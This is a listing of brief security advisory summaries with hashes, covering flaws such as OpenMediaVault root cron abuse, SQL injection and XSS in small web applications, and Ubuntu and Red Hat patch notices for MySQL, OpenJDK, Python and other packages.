OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.
977b68b131bff0d949e6b913d2598f3af7e54c6447c2599729d421f769bac029
Readymade Real Estate Script suffers from remote blind SQL injection and cross site scripting vulnerabilities. This was last validated on the build available as of July 12, 2024.
69386793e89cd8dd66c1d690fdd8aaaa1e52413aa12dedc645d9ef84ac9279a6
Ubuntu Security Notice 6934-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.39 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 24.04 LTS. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.
8e19ddfa7b465f3b22bb3e9d4a490937544b8838c05cfd5ad6de902d90a2f085
Ubuntu Security Notice 6932-1 - It was discovered that the Hotspot component of OpenJDK 21 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 21 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
92b1bafe6e5d4ee4b322aaab6a609d8615a3bfbb3a543f0940ed55bcc0c2a5b5
Ubuntu Security Notice 6931-1 - It was discovered that the Hotspot component of OpenJDK 17 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 17 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
b3e5f81d7594d4e27286cdf314c3ba39afa280b68b40db8274bd9a6fb236d9a4
Ubuntu Security Notice 6930-1 - It was discovered that the Hotspot component of OpenJDK 11 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 11 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
64ed7468d6981b59402fc69e4b058670397d166eba644ba4e17b84199bc55681
AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.
5058deb5a1cc69ff116aa38a8a8e12d52904972c6285fe8c8a0fcc30aabf4c26
Ubuntu Security Notice 6929-1 - It was discovered that the Hotspot component of OpenJDK 8 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 8 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
f4e9c4f3c7e69bd458944b9f132afa2f82f2fb0cc5990844424b460d546df0bd
Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.
d177460484605e92448747eb5276d4dbc65842e8466efab16cfdeff8b9e1e531
Ubuntu Security Notice 6928-1 - It was discovered that the Python ssl module contained a memory race condition when handling the APIs to obtain the CA certificates and certificate store statistics. This could possibly result in applications obtaining wrong results, leading to various SSL issues. It was discovered that the Python ipaddress module contained incorrect information about which IP address ranges were considered "private" or "globally reachable". This could possibly result in applications applying incorrect security policies.
6348aa6c803c2cb2243ee6f79a4a4964ae3836831f2a5635d54e6852bb5e11d9
SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.
22013989000d479ea07e76db9eff79fd7621f97874918eb37a3342e24fbd35df
AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.
760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b
Red Hat Security Advisory 2024-4938-03 - An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a null pointer vulnerability.
d452de2aa6e75076d2f3e8721c8b90b0bf1571959bdebabac8478415e805eb13
Red Hat Security Advisory 2024-4937-03 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a denial of service vulnerability.
4c2604fdae44be754d8a0513c7e63395b67fbfe9f90be45ce51de9fb3da3e457
Red Hat Security Advisory 2024-4936-03 - An update for the freeradius:3.0 module is now available for Red Hat Enterprise Linux 8.
e6d2c41175a0acd5861cc6a0c8176462281813df777cca58381e3fac1b9650a3
Red Hat Security Advisory 2024-4935-03 - An update for freeradius is now available for Red Hat Enterprise Linux 9.
2532e6dcb2d4da08b107649950751c606f734cf85dd66630e015ec8b37417713
Red Hat Security Advisory 2024-4934-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.
12fb5d6e5d2cdec776f8c371f3506e5c0f6387296d6267bb3de1a9c532930402
Red Hat Security Advisory 2024-4933-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a denial of service vulnerability.
55a61d1ba52b8b71b73acd02d2c990f7576342720ed726606929af825dd44ed1
AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
a27d6ecbb685d624f010c47638973a78a91c45496e0c3d8256ad20eeb76f2222
Red Hat Security Advisory 2024-4928-03 - An update for kernel is now available for Red Hat Enterprise Linux 9. Issues addressed include a null pointer vulnerability.
d85c1911157700d246f802349435694ee3fd873de2f76eb6b9c87f5544c9f2fe
Red Hat Security Advisory 2024-4922-03 - Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.
96baa5beae39a868e494284fbcfeb38307eb17a3a70b7bcfa63f53577cdc2dc6
Red Hat Security Advisory 2024-4913-03 - An update for the freeradius:3.0 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.
8b38e606db35992e5ab109b5e7053084677124debd879c04f500e3f14ad132c8
Red Hat Security Advisory 2024-4912-03 - An update for freeradius is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.
ddcfed84eceadbd19ceaf0a618b0d733d7ecb7c7ed690c29be91bc5ade7697f7
AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.
26ba3578925635eec579c27afdcf5dfe641d09db3c89b0df1e695a98b9056176
Red Hat Security Advisory 2024-4911-03 - An update for freeradius is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.
5686026f5780c87171eee9bd7ea8374d174b7ae8b314289fb9dac9e8ad1d9885